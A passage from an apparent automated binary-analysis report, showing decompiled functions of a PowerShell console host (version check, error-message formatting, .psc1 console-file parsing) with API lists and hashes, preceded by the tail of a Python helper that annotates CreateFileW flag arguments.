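    args = split_args(line[m.end():])
    if len(args) != 7:  # not a complete CreateFile call; leave the line alone
        return line
    return line.rstrip() + "  // " + describe_createfile([parse_int(a) for a in args[1:]])


def annotate(lines):
    return [annotate_line(line) for line in lines]


# Constructed input: the first line is the call from the decompiled function above; the other
# two are made up to exercise multi-bit masks and the pass-through path.
SAMPLE_LINES = [
    "_t50 = CreateFileW(_t96, 1, 1, 0, 3, 0, 0);",
    "h = CreateFileW(path, 0xc0000000, 0, 0, 2, 0x04000080, 0);",
    "E01259691(_t99 - 0x14);",
]

if __name__ == "__main__":
    for out in annotate(SAMPLE_LINES):
        print(out)
```

Run on the first sample line the helper appends `access=FILE_READ_DATA, share=FILE_SHARE_READ, disposition=OPEN_EXISTING, flags=0`, which is the open-for-read probe the function performs before closing the handle. The argument splitter respects nested parentheses, so decompiler expressions such as `*(_t99 - 0x14)` in an argument position do not break the parse; they simply decode as `?`.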

[Per-line instruction address column from the interactive disassembly view, covering the function body above from 0x0125c5fd to 0x0125c766 (0x00000000 for the goto lines); not reproduced here.]
                                                                                                                                                                                                                              0x0125c76c
                                                                                                                                                                                                                              0x0125c76f
                                                                                                                                                                                                                              0x0125c775
                                                                                                                                                                                                                              0x0125c77f

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125C604
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00000001,00000001,?,00000003,?,?,?,00000018,0125CD86,?,?,?,00000000,00000001), ref: 0125C638
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000001,00000001,?,00000003,?,?,?,00000018,0125CD86,?,?,?,00000000,00000001), ref: 0125C643
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000001,00000001,?,00000003,?,?,?,00000018,0125CD86,?,?,?,00000000,00000001), ref: 0125C66F
                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0125C74C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateErrorFileFreeH_prolog3_HandleLastString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1415290090-0
                                                                                                                                                                                                                              • Opcode ID: 21b385dbda5692ec9cb712df02a49c5c6887165a5df517d07f55004c2d52415f
                                                                                                                                                                                                                              • Instruction ID: f38d782c0c04d886e1a8301aec89a3c96187373e3e0ffbfa28e8bfa7986922cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21b385dbda5692ec9cb712df02a49c5c6887165a5df517d07f55004c2d52415f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6751B270A10246DFDF54DB64D989ABE7B79BF88711F108258EA11A72E4D7306D12CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

C-Code - Quality: 22%
E012595A0(void* __edx) {
	signed int _v8;
	struct _OSVERSIONINFOEXW _v292;
	signed int _t16;
	int _t23;
	void* _t25;
	void* _t29;
	void* _t30;
	void* _t31;
	signed int _t32;

	_t29 = __edx;
	_t16 =  *0x1260358; // 0xc21f7063
	_v8 = _t16 ^ _t32;
	_v292.dwOSVersionInfoSize = 0x11c;
	_v292.dwMajorVersion = 0;
	_v292.dwMinorVersion = 0;
	_v292.dwBuildNumber = 0;
	_v292.dwPlatformId = 0;
	memset( &(_v292.szCSDVersion), 0, 0x100);
	_v292.wServicePackMajor = 0;
	_v292.wServicePackMinor = 0;
	_v292.wProductType = 0;
	__imp__VerSetConditionMask(0, 0, 2, 3, 1, 3, 0x20, 3);
	__imp__VerSetConditionMask(0, _t29);
	__imp__VerSetConditionMask(0, _t29);
	_push(_t29);
	_v292.dwMajorVersion = 6;
	_v292.dwMinorVersion = 1;
	_v292.wServicePackMajor = 0;
	if(VerifyVersionInfoW( &_v292, 0x23, 0) == 0) {
		_t23 = 0;
	} else {
		_t23 = 1;
	}
	return E01259A40(_t23, _t25, _v8 ^ _t32, _t29, _t30, _t31);
}

0x012595a0
0x012595ab
0x012595b2
0x012595c0
0x012595cd
0x012595d7
0x012595e1
0x012595eb
0x012595f5
0x012595ff
0x01259603
0x01259606
0x01259618
0x01259620
0x01259628
0x0125962e
0x01259638
0x01259644
0x0125964f
0x0125965b
0x0125966f
0x0125965d
0x0125965d
0x0125965d
0x0125966c

APIs
• memset.MSVCRT ref: 012595F5
• VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 01259618
• VerSetConditionMask.KERNEL32(00000000), ref: 01259620
• VerSetConditionMask.KERNEL32(00000000), ref: 01259628
• VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 01259653
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: ConditionMask$InfoVerifyVersionmemset
• String ID:
• API String ID: 375572348-0
• Opcode ID: f2fcab8288d3e39d1372d6547fc6c49e800ebb886d1d0934c48672f10279b797
• Instruction ID: ca354cbfc448f75b1355c8dad239bfc3fe8c11c16ee5dfb2bbaa57313efdd9e6
• Opcode Fuzzy Hash: f2fcab8288d3e39d1372d6547fc6c49e800ebb886d1d0934c48672f10279b797
• Instruction Fuzzy Hash: D8111FB0A5030CAEEF609F60DC4ABEA77B8AF48704F008099EA05E61C1D7B55A548FA4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 57%
E0125C4E0(intOrPtr* __ecx, long _a4, intOrPtr _a8, intOrPtr _a12) {
	signed int _v8;
	short _v12;
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	signed int _t20;
	intOrPtr* _t31;
	void* _t32;
	signed int _t47;
	void* _t48;
	void* _t49;
                                                                                                                                                                                                                              				long _t51;
                                                                                                                                                                                                                              				void* _t52;
                                                                                                                                                                                                                              				signed int _t54;
                                                                                                                                                                                                                              
                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                              				_t20 =  *0x1260358; // 0xc21f7063
                                                                                                                                                                                                                              				_v8 = _t20 ^ _t54;
                                                                                                                                                                                                                              				_t31 = __ecx;
                                                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                                                              				_t51 = FormatMessageW(0x1100, 0, _a4, 0,  &_v12, 0, 0);
                                                                                                                                                                                                                              				_t57 = _t51;
                                                                                                                                                                                                                              				if(_t51 == 0) {
                                                                                                                                                                                                                              					L8:
                                                                                                                                                                                                                              					_pop(_t52);
                                                                                                                                                                                                                              					_pop(_t32);
                                                                                                                                                                                                                              					return E01259A40(_t23, _t32, _v8 ^ _t54, _t46, _t48, _t52);
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              				_push(_t48);
                                                                                                                                                                                                                              				_t5 = _t51 + 1; // 0x1
                                                                                                                                                                                                                              				_t47 = 2;
                                                                                                                                                                                                                              				_t46 = _t5 * _t47 >> 0x20;
                                                                                                                                                                                                                              				_t49 = E0125972E( ~(0 | _t57 > 0x00000000) | _t5 * _t47);
                                                                                                                                                                                                                              				if(_t49 != 0) {
                                                                                                                                                                                                                              					_t13 = _t51 + 1; // 0x1
                                                                                                                                                                                                                              					_t46 = _t13;
                                                                                                                                                                                                                              					if(E0125CE50(_t49, _t13, _v12) < 0) {
                                                                                                                                                                                                                              						_t51 = 0;
                                                                                                                                                                                                                              						free(_t49);
                                                                                                                                                                                                                              						_t49 = 0;
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              				_t23 = LocalFree(_v12);
                                                                                                                                                                                                                              				if(_t51 != 0) {
                                                                                                                                                                                                                              					 *0x1261204(_t31, 0, _a8, _a12, _t49);
                                                                                                                                                                                                                              					_t23 =  *((intOrPtr*)( *_t31 + 4))();
                                                                                                                                                                                                                              					if(_t49 != 0) {
                                                                                                                                                                                                                              						free(_t49);
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              				_pop(_t48);
                                                                                                                                                                                                                              				goto L8;
                                                                                                                                                                                                                              			}

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00000000), ref: 0125C50A
                                                                                                                                                                                                                                • Part of subcall function 0125972E: malloc.MSVCRT ref: 01259748
                                                                                                                                                                                                                              • free.MSVCRT(00000000,?), ref: 0125C549
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0125C554
                                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 0125C57E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$FormatFreeLocalMessagemalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 917807956-0
                                                                                                                                                                                                                              • Opcode ID: a9db8739abb4400d3cb25a2937b431f18a0aaa673906d264a4335ee00d62dbb5
                                                                                                                                                                                                                              • Instruction ID: 80f84a31b4f167a93f73d2af9ed5fa54c40586303e4265efd7cfc5e5f3903c33
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9db8739abb4400d3cb25a2937b431f18a0aaa673906d264a4335ee00d62dbb5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D11E77261020ABFDF299F64EC89DBFBB6DDF84614B10421EFD0696190FB71ED109650
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                                                                                              			E0125C8A4(void* __ebx, intOrPtr __ecx, signed int* __edx, intOrPtr* __edi, intOrPtr* __esi, void* __eflags) {
                                                                                                                                                                                                                              				intOrPtr* _t51;
                                                                                                                                                                                                                              				intOrPtr* _t59;
                                                                                                                                                                                                                              				intOrPtr* _t62;
                                                                                                                                                                                                                              				intOrPtr* _t66;
                                                                                                                                                                                                                              				intOrPtr* _t70;
                                                                                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                                                                                              				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr _t96;
				intOrPtr* _t103;
				void* _t122;

				_t121 = __esi;
				_t117 = __edi;
				_push(0x28);
				E0125A5F0(E0125A8EC, __ebx, __edi, __esi);
				 *(_t122 - 0x34) = __edx;
				_t84 = __ecx;
				 *((intOrPtr*)(_t122 - 0x28)) = __ecx;
				 *((char*)(_t122 - 0x11)) = 1;
				 *((intOrPtr*)(_t122 - 4)) = 0;
				 *((intOrPtr*)(_t122 - 0x20)) = 0;
				 *((intOrPtr*)(_t122 - 0x18)) = 0;
				 *((intOrPtr*)(_t122 - 0x1c)) = 0;
				 *((char*)(_t122 - 4)) = 3;
				if(E01259200(__ecx) != 0 ||  *((intOrPtr*)(_t122 + 8)) == 0) {
					L31:
					_t85 = 0;
					goto L21;
				} else {
					_t129 = __edx;
					if(__edx == 0) {
						goto L31;
					}
					_push(L"/PSConsoleFile");
					E0125BAF5(_t84, _t122 - 0x2c, __edi, __esi, _t129);
					 *((char*)(_t122 - 4)) = 4;
					_t121 =  *((intOrPtr*)(_t122 - 0x2c));
					if(_t121 == 0) {
						_t96 = 0;
						__eflags = 0;
					} else {
						_t96 =  *_t121;
					}
					_t59 =  *((intOrPtr*)(_t122 + 8));
					 *0x1261204(_t59, _t96, _t122 - 0x20);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0x94))))() < 0) {
						L27:
						_push(_t84);
						_push(0x22);
						goto L28;
					} else {
						_t66 =  *((intOrPtr*)(_t122 - 0x20));
						if(_t66 == 0) {
							goto L27;
						}
						_t120 =  *((intOrPtr*)( *_t66 + 0x44));
						 *0x1261204(_t66, _t122 - 0x18);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t66 + 0x44))))() < 0) {
							L26:
							_push(_t84);
							_push(0xf);
							L28:
							_t62 =  *0x12606dc; // 0x3403de0
							_t117 =  *_t62;
							 *0x1261204(_t62, 0);
							 *((intOrPtr*)( *_t62 + 4))();
							_t85 = 0;
							__eflags = 0;
							L29:
							__eflags = _t121;
							if(_t121 != 0) {
								E0125BB5A(_t121);
							}
							L21:
							E01259691(_t122 - 0x1c);
							 *((char*)(_t122 - 4)) = 6;
							_t51 =  *((intOrPtr*)(_t122 - 0x18));
							if(_t51 != 0) {
								_t121 =  *((intOrPtr*)( *_t51 + 8));
								 *0x1261204(_t51);
								 *((intOrPtr*)( *((intOrPtr*)( *_t51 + 8))))();
							}
							E01259691(_t122 - 0x20);
							E01259691(_t122 + 8);
							return E0125A59F(_t85, _t117, _t121);
						}
						_t134 =  *((intOrPtr*)(_t122 - 0x18));
						if( *((intOrPtr*)(_t122 - 0x18)) == 0) {
							goto L26;
						}
						_push(L"ConsoleSchemaVersion");
						E0125BAF5(_t84, _t122 - 0x30, _t120, _t121, _t134);
						 *((char*)(_t122 - 4)) = 5;
						_t117 =  *((intOrPtr*)(_t122 - 0x30));
						if(_t117 == 0) {
							_t103 = 0;
							__eflags = 0;
						} else {
							_t103 =  *_t117;
						}
						_t70 =  *((intOrPtr*)(_t122 - 0x18));
						 *0x1261204(_t70, _t103, _t122 - 0x1c);
						if( *((intOrPtr*)( *_t70 + 0x1c))() < 0) {
							L24:
							_t73 =  *0x12606dc; // 0x3403de0
							 *0x1261204(_t73, 0, 0xf,  *((intOrPtr*)(_t122 - 0x28)));
							 *((intOrPtr*)( *_t73 + 4))();
							_t85 = 0;
							__eflags = _t117;
							if(_t117 != 0) {
								E0125BB5A(_t117);
							}
							goto L29;
						} else {
							_t77 =  *((intOrPtr*)(_t122 - 0x1c));
							if(_t77 == 0) {
								goto L24;
							}
							 *(_t122 - 0x24) =  *(_t122 - 0x24) & 0x00000000;
							 *0x1261204(_t77, _t122 - 0x24);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t77 + 0x68))))() < 0) {
								goto L24;
							}
							 *( *(_t122 - 0x34)) =  *(_t122 - 0x24);
							if(_t117 != 0) {
								E0125BB5A(_t117);
							}
							if(_t121 != 0) {
								E0125BB5A(_t121);
							}
							_t85 =  *((intOrPtr*)(_t122 - 0x11));
							goto L21;
						}
					}
				}
			}

                                                                                                                                                                                                                              0x0125c8a4
                                                                                                                                                                                                                              0x0125c8a4
                                                                                                                                                                                                                              0x0125c8a4
                                                                                                                                                                                                                              0x0125c8ab
                                                                                                                                                                                                                              0x0125c8b0
                                                                                                                                                                                                                              0x0125c8b3
                                                                                                                                                                                                                              0x0125c8b5
                                                                                                                                                                                                                              0x0125c8ba
                                                                                                                                                                                                                              0x0125c8be
                                                                                                                                                                                                                              0x0125c8c1
                                                                                                                                                                                                                              0x0125c8c4
                                                                                                                                                                                                                              0x0125c8c7
                                                                                                                                                                                                                              0x0125c8cb
                                                                                                                                                                                                                              0x0125c8d6
                                                                                                                                                                                                                              0x0125ca82
                                                                                                                                                                                                                              0x0125ca82
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c8e6
                                                                                                                                                                                                                              0x0125c8e6
                                                                                                                                                                                                                              0x0125c8e8
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c8ee
                                                                                                                                                                                                                              0x0125c8f6
                                                                                                                                                                                                                              0x0125c8fb
                                                                                                                                                                                                                              0x0125c8ff
                                                                                                                                                                                                                              0x0125c904
                                                                                                                                                                                                                              0x0125c90a
                                                                                                                                                                                                                              0x0125c90a
                                                                                                                                                                                                                              0x0125c906
                                                                                                                                                                                                                              0x0125c906
                                                                                                                                                                                                                              0x0125c906
                                                                                                                                                                                                                              0x0125c90c
                                                                                                                                                                                                                              0x0125c91f
                                                                                                                                                                                                                              0x0125c929
                                                                                                                                                                                                                              0x0125ca50
                                                                                                                                                                                                                              0x0125ca50
                                                                                                                                                                                                                              0x0125ca51
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c92f
                                                                                                                                                                                                                              0x0125c92f
                                                                                                                                                                                                                              0x0125c934
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c941
                                                                                                                                                                                                                              0x0125c946
                                                                                                                                                                                                                              0x0125c950
                                                                                                                                                                                                                              0x0125ca4b
                                                                                                                                                                                                                              0x0125ca4b
                                                                                                                                                                                                                              0x0125ca4c
                                                                                                                                                                                                                              0x0125ca53
                                                                                                                                                                                                                              0x0125ca53
                                                                                                                                                                                                                              0x0125ca5b
                                                                                                                                                                                                                              0x0125ca60
                                                                                                                                                                                                                              0x0125ca66
                                                                                                                                                                                                                              0x0125ca6c
                                                                                                                                                                                                                              0x0125ca6c
                                                                                                                                                                                                                              0x0125ca6e
                                                                                                                                                                                                                              0x0125ca6e
                                                                                                                                                                                                                              0x0125ca70
                                                                                                                                                                                                                              0x0125ca78
                                                                                                                                                                                                                              0x0125ca78
                                                                                                                                                                                                                              0x0125c9e1
                                                                                                                                                                                                                              0x0125c9e4
                                                                                                                                                                                                                              0x0125c9e9
                                                                                                                                                                                                                              0x0125c9ed
                                                                                                                                                                                                                              0x0125c9f2
                                                                                                                                                                                                                              0x0125c9f7
                                                                                                                                                                                                                              0x0125c9fc
                                                                                                                                                                                                                              0x0125ca02
                                                                                                                                                                                                                              0x0125ca02
                                                                                                                                                                                                                              0x0125ca07
                                                                                                                                                                                                                              0x0125ca0f
                                                                                                                                                                                                                              0x0125ca1b
                                                                                                                                                                                                                              0x0125ca1b
                                                                                                                                                                                                                              0x0125c956
                                                                                                                                                                                                                              0x0125c95a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c960
                                                                                                                                                                                                                              0x0125c968
                                                                                                                                                                                                                              0x0125c96d
                                                                                                                                                                                                                              0x0125c971
                                                                                                                                                                                                                              0x0125c976
                                                                                                                                                                                                                              0x0125c97c
                                                                                                                                                                                                                              0x0125c97c
                                                                                                                                                                                                                              0x0125c978
                                                                                                                                                                                                                              0x0125c978
                                                                                                                                                                                                                              0x0125c978
                                                                                                                                                                                                                              0x0125c97e
                                                                                                                                                                                                                              0x0125c98c
                                                                                                                                                                                                                              0x0125c997
                                                                                                                                                                                                                              0x0125ca1e
                                                                                                                                                                                                                              0x0125ca1e
                                                                                                                                                                                                                              0x0125ca30
                                                                                                                                                                                                                              0x0125ca36
                                                                                                                                                                                                                              0x0125ca3c
                                                                                                                                                                                                                              0x0125ca3e
                                                                                                                                                                                                                              0x0125ca40
                                                                                                                                                                                                                              0x0125ca44
                                                                                                                                                                                                                              0x0125ca44
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c99d
                                                                                                                                                                                                                              0x0125c99d
                                                                                                                                                                                                                              0x0125c9a2
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c9a4
                                                                                                                                                                                                                              0x0125c9b4
                                                                                                                                                                                                                              0x0125c9be
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c9c6
                                                                                                                                                                                                                              0x0125c9ca
                                                                                                                                                                                                                              0x0125c9ce
                                                                                                                                                                                                                              0x0125c9ce
                                                                                                                                                                                                                              0x0125c9d5
                                                                                                                                                                                                                              0x0125c9d9
                                                                                                                                                                                                                              0x0125c9d9
                                                                                                                                                                                                                              0x0125c9de
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c9de
                                                                                                                                                                                                                              0x0125c997
                                                                                                                                                                                                                              0x0125c929

APIs
• __EH_prolog3_GS.LIBCMT ref: 0125C8AB
• Part of subcall function 0125BAF5: __EH_prolog3.LIBCMT ref: 0125BAFC
• Part of subcall function 0125BAF5: _CxxThrowException.MSVCRT(00000000,0125F57C), ref: 0125BB4B
Strings
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: ExceptionH_prolog3H_prolog3_Throw
• String ID: /PSConsoleFile$ConsoleSchemaVersion
• API String ID: 406206064-2413366295
• Opcode ID: 3338a810907d9c41cc17219d43bacc42696567b8d68c7832eb12be207afa5d0d
• Instruction ID: 11b72afb84f07a6513fa7cb7429b94c69033436c50e8617162d06dfec7e21a21
• Opcode Fuzzy Hash: 3338a810907d9c41cc17219d43bacc42696567b8d68c7832eb12be207afa5d0d
• Instruction Fuzzy Hash: 6951E5B0A10246DFDB94DF68D9D5BBDBBB9AF98300F148018DE05EB295EB70AD11CB50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 54%
E0125C11A(wchar_t* __ecx, void* __edx) {
	signed int _v8;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t5;
	intOrPtr* _t8;
	short* _t13;
	int _t14;
	int _t16;
	void* _t17;
	void* _t25;
	wchar_t* _t27;
	void* _t28;
	void* _t29;
	signed int _t31;

	_t25 = __edx;
	_push(__ecx);
	_t5 =  *0x1260358; // 0xc21f7063
	_v8 = _t5 ^ _t31;
	_t27 = __ecx;
	if(E01259200(__ecx) != 0) {
		L4:
		_t8 =  *0x12606dc; // 0x3403de0
		_t16 = 0;
		 *0x1261204(0, 0x1a, _t27, _t29);
		 *((intOrPtr*)( *_t8 + 4))();
		_t29 = _t8;
	} else {
		_t13 = wcsrchr(_t27, 0x2e);
		if(_t13 == 0) {
			goto L4;
		} else {
			_t16 = 1;
			_t14 = CompareStringW(0x7f, 1, _t13, 0xffffffff, L".psc1", 5);
			if(_t14 == 0 || _t14 != 2) {
				goto L4;
			}
		}
	}
	_pop(_t28);
	_pop(_t17);
	return E01259A40(_t16, _t17, _v8 ^ _t31, _t25, _t28, _t29);
}

0x0125c11a
0x0125c11f
0x0125c120
0x0125c127
0x0125c12c
0x0125c136
0x0125c166
0x0125c166
0x0125c16b
0x0125c178
0x0125c17e
0x0125c184
0x0125c138
0x0125c13b
0x0125c145
0x00000000
0x0125c147
0x0125c153
0x0125c157
0x0125c15f
0x00000000
0x00000000
0x0125c15f
0x0125c145
0x0125c18a
0x0125c18d
0x0125c196

APIs
• wcsrchr.MSVCRT ref: 0125C13B
• CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,.psc1,00000005), ref: 0125C157
Strings
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: CompareStringwcsrchr
• String ID: .psc1
• API String ID: 732174003-2589272243
• Opcode ID: 9dcacf51e14d4611631e8dede4b6aeeb2381c29d71c7856f401e54fe692ab4ba
• Instruction ID: 0c0ed777db754b461d515ea4c2980b4ac6377f707bc2614a523bc4c578e229fe
• Opcode Fuzzy Hash: 9dcacf51e14d4611631e8dede4b6aeeb2381c29d71c7856f401e54fe692ab4ba
• Instruction Fuzzy Hash: 8801F5302503096FE7209F59AC89E7777ACDB86A64B004119F915D31D0EE70AC10C664
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 40%
E0125A512() {
	intOrPtr* _t15;
	void* _t17;
	void* _t19;
	void* _t20;
	void* _t21;
	void* _t22;

	_push(0x48);
	E0125A5F0(E0125A7A3, _t17, _t20, _t21);
	E0125E172(_t17, _t22 - 0x2c, "invalid string position");
	 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
	_push(0);
	_t19 = _t22 - 0x54;
	E0125A353(_t19, _t22 - 0x2c);
	_push(0x125f540);
	_push(_t22 - 0x54);
	L01259E2C();
	asm("int3");
	asm("int3");
	asm("int3");
	asm("int3");
	asm("int3");
	_t15 = _t19 + 0x10;
	if( *((intOrPtr*)(_t19 + 0x24)) >= 0x10) {
		return  *_t15;
	}
	return _t15;
}

0x0125a512
0x0125a519
0x0125a526
0x0125a52b
0x0125a532
0x0125a535
0x0125a538
0x0125a53d
0x0125a545
0x0125a546
0x0125a54b
0x0125a54c
                                                                                                                                                                                                                              0x0125a54d
                                                                                                                                                                                                                              0x0125a54e
                                                                                                                                                                                                                              0x0125a54f
                                                                                                                                                                                                                              0x0125a554
                                                                                                                                                                                                                              0x0125a557
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125a559
                                                                                                                                                                                                                              0x0125a55b

APIs
• __EH_prolog3_GS.LIBCMT ref: 0125A519
  • Part of subcall function 0125A353: std::runtime_error::runtime_error.LIBCPMT ref: 0125A362
• _CxxThrowException.MSVCRT(?,0125F540), ref: 0125A546
Strings
• invalid string position, xrefs: 0125A51E
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: ExceptionH_prolog3_Throwstd::runtime_error::runtime_error
• String ID: invalid string position
• API String ID: 1629767425-1799206989
• Opcode ID: 2ab658f4a9a224b8c90d8c90b4e98699977be2c9570a6dd6a45affef42b97cbc
• Instruction ID: 4714e3bbf3868a4f81fecacbba58dc9fccb15f835f2f6c0332d83168483c8c91
• Opcode Fuzzy Hash: 2ab658f4a9a224b8c90d8c90b4e98699977be2c9570a6dd6a45affef42b97cbc
• Instruction Fuzzy Hash: 7AE0ED71970109ABDF84EB94D9C6FDC7378AB28708F608559D912AB040EB749A09C724
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 41%
			E0125A4DA() {
				intOrPtr* _t27;
				void* _t29;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t36;

				_push(0x48);
				E0125A5F0(E0125A7A3, _t29, _t34, _t35);
				E0125E172(_t29, _t36 - 0x2c, "string too long");
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E0125A293(_t36 - 0x54, _t36 - 0x2c);
				_push(0x125f504);
				_push(_t36 - 0x54);
				L01259E2C();
				asm("int3");
				_push(0x48);
				E0125A5F0(E0125A7A3, _t29, _t34, _t35);
				E0125E172(_t29, _t36 - 0x2c, "invalid string position");
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				_push(0);
				_t33 = _t36 - 0x54;
				E0125A353(_t33, _t36 - 0x2c);
				_push(0x125f540);
				_push(_t36 - 0x54);
				L01259E2C();
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t27 = _t33 + 0x10;
				if( *((intOrPtr*)(_t33 + 0x24)) >= 0x10) {
					return  *_t27;
				}
				return _t27;
			}

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125A4E1
                                                                                                                                                                                                                                • Part of subcall function 0125A293: std::runtime_error::runtime_error.LIBCPMT ref: 0125A2A2
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(?,0125F504), ref: 0125A50C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
